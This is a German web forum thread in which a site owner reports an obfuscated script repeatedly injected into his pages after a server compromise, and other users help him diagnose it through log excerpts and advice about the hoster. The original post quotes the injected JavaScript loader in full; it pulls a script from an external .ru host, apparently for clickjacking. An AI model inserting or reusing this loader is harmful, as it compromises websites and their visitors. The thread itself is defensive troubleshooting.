nicht angemeldet
Komischer Code
Hallo,
seit ein paar Tagen finde ich immer wieder folgenden Code auf meiner WebSeite:
<script>/*Exception*/ document.write('<script src='+'h@@!!(t)@!t@(p$(:#/@)^#/^!&t))@r#a^!^i(!))d^n&t!!@@)-(!$$n$e!(@t(&.!y$^!n(@$e$^$t()^&.))c#&)o!)@)#m$.$^#))k(i&(n$@@@o!$^$-)&!t!!$o(@(.@^y#o@^(u)@r#(!$a(u#t@h&$@e@$n^!t^@^i#)c&&^.&^$r!!$&u@():@&8#$0^^^@8$&0##/^(^@r)!!i@v$@a#l)^)s$().!^!&@c)!@o#)m^&/^r&i&)v!^##a^#@l^^s@&.$)c@)^o&^m!)/^&#g!!o^o@g((l@e)&).##c)o&()@m(^/#a$$r@^#g&#o!&^$s).)@&)c(^!o^##.^)u!&k(/(&#$r($^a&^&k&!u^)t@(#((e@n!#$.@$&#n!#$e#&.$(!j&p!$/!!('.replace(/#|@|\(|\)|\^|&|\$|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6ca2ed83f8029d658fefdb4d16e13c53-->
ich habe gestern Abend gegen 21 Uhr mein Projekt komplett neu hochgeladen. Hab alle FTP Kennwörter geändert. Heute morgen schau ich wieder auf meine Setie und was sehe ich da? richtig den Code von oben. Bin mit FileZilla auf mein Web gegangen und habe gesehen dass gegen 02:33 Uhr sämtliche Daten wieder geändert wurden.
Ein Backup wurde nicht eingespielt. Was ist das bitte?
Gruß,
Jochen
-
h1,
Ein Backup wurde nicht eingespielt. Was ist das bitte?
Sowas kann auch auf dem Übertragungsweg eingebaut werden. Das Protokoll dazu heißt ICAP, Internet Content Adaption Protocol.
Frag mal Deinen Zugangsprovider ;-)
Hotti
-
Hi,
Sowas kann auch auf dem Übertragungsweg eingebaut werden. Das Protokoll dazu heißt ICAP, Internet Content Adaption Protocol.
Frag mal Deinen Zugangsprovider ;-)ich glaube, nur die wenigsten Zugangsprovider werden auf Webseiten ein Script mit der URL "http://traidnt-net.ynet.com.kino-to.yourauthentic.ru:8080/rivals.com/rivals.com/google.com/argos.co.uk/rakuten.ne.jp/" einbinden - und diejenigen, die es tun, antworten vermutlich auf entsprechende Fragen nicht wirklich im Sinne des Fragestellers. Ich würde eher nach Lücken in den auf dem Server laufenden Software-Paketen suchen.
Cheatah
--
X-Self-Code: sh:( fo:} ch:~ rl:| br:> n4:& ie:% mo:) va:) de:] zu:) fl:{ ss:) ls:~ js:|
X-Self-Code-Url: http://emmanuel.dammerer.at/selfcode.html
X-Will-Answer-Email: No
X-Please-Search-Archive-First: Absolutely Yes-
hi,
.. Ich würde eher nach Lücken in den auf dem Server laufenden Software-Paketen suchen.
Oder mal in die Apache-Konfiguration gucken. Evntl. wurde da gar ein eigener Apache installiert und er Richtige abgeschossen. Also so langsam interessiert mich das auch, was da los ist....
Hotti
-
Hallo,
Also so langsam interessiert mich das auch, was da los ist....
mich auch, ich schau mir gerade die Logs mal an, ob ich da etwas erfahren kann.
Gruß,
Jochen-
h1,
mich auch, ich schau mir gerade die Logs mal an, ob ich da etwas erfahren kann.
in die .htaccess würde ich auch mal gucken...
-
Hallo,
was mir immer mal wieder auffällt ist folgendes:
38.100.8.50 - - [21/Jan/2010:04:03:42 +0100] "GET /robots.txt HTTP/1.1" 404 1051 "-" "panscient.com"
122.167.134.174 - - [21/Jan/2010:08:15:13 +0100] "GET /plugin/js/hover.js HTTP/1.1" 200 2168 "XXXXXXX" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.167.134.174 - - [21/Jan/2010:08:15:13 +0100] "GET /plugin/js/check.js HTTP/1.1" 200 3131 "XXXXXXX" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.167.134.174 - - [21/Jan/2010:08:15:13 +0100] "GET /media/css/css_flas_hover.css HTTP/1.1" 200 1554 "XXXXXXX" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.167.134.174 - - [21/Jan/2010:08:15:13 +0100] "GET /plugin/sonstiges/facebox/facebox.css HTTP/1.1" 200 1434 "XXXXXXX" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.167.134.174 - - [21/Jan/2010:08:15:13 +0100] "GET /media/css/css.css HTTP/1.1" 200 20064 "XXXXXXX" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
122.167.134.174 - - [21/Jan/2010:08:15:13 +0100] "GET /plugin/js/validators.js HTTP/1.1" 200 8022 "XXXXXXX" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
das habe ich in der access_log gesehen. Muss ich noch eine Datei durchsuchen?
Gruß,
Jochen-
Hi!
was mir immer mal wieder auffällt ist folgendes:
Was genau ist es, was dir daran auffällt?
38.100.8.50 - - [21/Jan/2010:04:03:42 +0100] "GET /robots.txt HTTP/1.1" 404 1051 "-" "panscient.com"
Das war ein Versuch die /robots.txt zu lesen. Eine solche gibt es offensichtlich nicht, denn der Request wurde mit 404 beantwortet. Die restlichen Requests waren alle erfolgreich (200) und ich sehe irgendwie nichts grundsätzlich verdächtiges an ihnen. Aber ich weiß auch nicht, was auf deinem Server vorhanden sein darf und was nicht.
Lo!
-
Hallo,
das steht in der error_log, kommt auch erst seit ein paar Tagen vor:
[Fri Jan 22 01:24:48 2010] [error] [client 64.182.98.80] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
Gruß,
Jochen-
Hallo,
[Fri Jan 22 01:24:48 2010] [error] [client 64.182.98.80] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
das hat wohl jeder mal im Logfile zu stehen. Siehe hier: http://isc.sans.org/diary.html?storyid=900
Ist für sich genommen harmlos. Allerdings solltest du schnellstens herausfinden, ob eine Schwachstelle gefunden wurde.Grüße
-
-
Ich nehme kaum an, dass Du irgendwelche Spuren des Angriffs in den Apache Logs finden wirst, eher in /var/dump/auth.log; über das Shell-Kommando "w" kannst Du außerdem herausfinden, welche user eingeloggt sind und was sie machen.
Gruß, LX
--
RFC 1925, Satz 6a: Es ist immer möglich, einen weiteren Umweg einzufügen.
RFC 1925, Satz 11a: Siehe Regel 6a
-
-
-
-
-
-
-
Es wird das Script mit der URL:
http://traidnt-net.ynet.com.kino-to.yourauthentic.ru:8080/rivals.com/rivals.com/google.com/argos.co.uk/rakuten.ne.jp/
auf Deiner Seite eingebunden. Das wiederum bindet einen unsichtbaren iframe auf Deiner Seite ein, über den offenbar Clickjacking betrieben wird.
Gruß, LX
--
RFC 1925, Satz 6a: Es ist immer möglich, einen weiteren Umweg einzufügen.
RFC 1925, Satz 11a: Siehe Regel 6a
-
Hallo,
Es wird das Script mit der URL:
http://traidnt-net.ynet.com.kino-to.yourauthentic.ru:8080/rivals.com/rivals.com/google.com/argos.co.uk/rakuten.ne.jp/
auf Deiner Seite eingebunden. Das wiederum bindet einen unsichtbaren iframe auf Deiner Seite ein, über den offenbar Clickjacking betrieben wird.
das macht mir jetzt aber etwas Angst, wie kann das denn sein? ich habe meine FTP Daten geändert, hab alles neu hochgeladen usw. Ein paar Stunden später wurden wieder Daten hochgeladen aber definitiv nicht von mir. Was kann ich jetzt machen?
Gruß,
Jochen-
Wer betreibt den Server? Informiere den Betreffenden sofort über sein Sicherheitsproblem. Ich nehme sehr an, dass das System, auf dem der FTP läuft, sicherheitstechnisch kompromittiert wurde. Die Angreifer haben sich entweder einen User-Account oder bereits root-Rechte auf dem Server beschafft, so dass Du ändern kannst, so viel Du möchtest, sie können jederzeit ihren Müll wieder einfügen.
Gruß, LX
--
RFC 1925, Satz 6a: Es ist immer möglich, einen weiteren Umweg einzufügen.
RFC 1925, Satz 11a: Siehe Regel 6a
-
-
-
Hi!
seit ein paar Tagen finde ich immer wieder folgenden Code auf meiner WebSeite:
Was ist das bitte?Was es ist, ist im Prinzip egal. Es bleibt in jedem Fall unerwünscht. Interessanter ist es eher, die Antwort auf die Frage, wie es dahinein gelangt. Als Außenstehender kann dir das sicherlich keiner konkret und sofort beantworten. Aber Vorgehensweisen für die Ursachensuche kann ich vorschlagen.
Zum einen sind da die Logfiles, die du befragen könntest, was zur fraglichen Zeit passiert ist. Vorausgesetzt, sie wurden nicht ebenfalls manipuliert. Ebenso erschwerend macht es die Auswertung, wenn die Site auch bei normaler Anwendung heftigem Traffic unterliegt. In den Logfiles würde ich nach Informationen suchen, die mir sagen, welches Script das Tor für den Einbruch war. Wie findet man sowas? Das kann man nicht genau definieren. Es kann sein, dass URLs mit ungewöhnlichen Parametern Hinweise geben. Bei per POST übertragenen Werten machen sie das üblicherweise aber schonmal nicht. Vielleicht konnte auch jemand eine Datei uploaden, die irgendwo sofort aufrufbar abgelegt wurde.
Wenn du keine solchen gezielten Hinweise findest, würde ich als nächstes allen Code nach den üblichen Unachtsamkeiten hin untersuchen. Das ist eine der am häufigsten auftretenden Ursachen.
Der nächste Schritt wäre, dass du dich an deinen Hoster/Serververantwortlichen wendest und ihn um Mithilfe bittest. Bei mehrfach genutzten Servern kann die Lücke ja auch in anderen Anwendungen stecken. Das wäre aber oftmals gepaart mit einer generellen Fehler im Konfiguationskonzept oder zumindest falsch vergebenen Rechten.
Lo!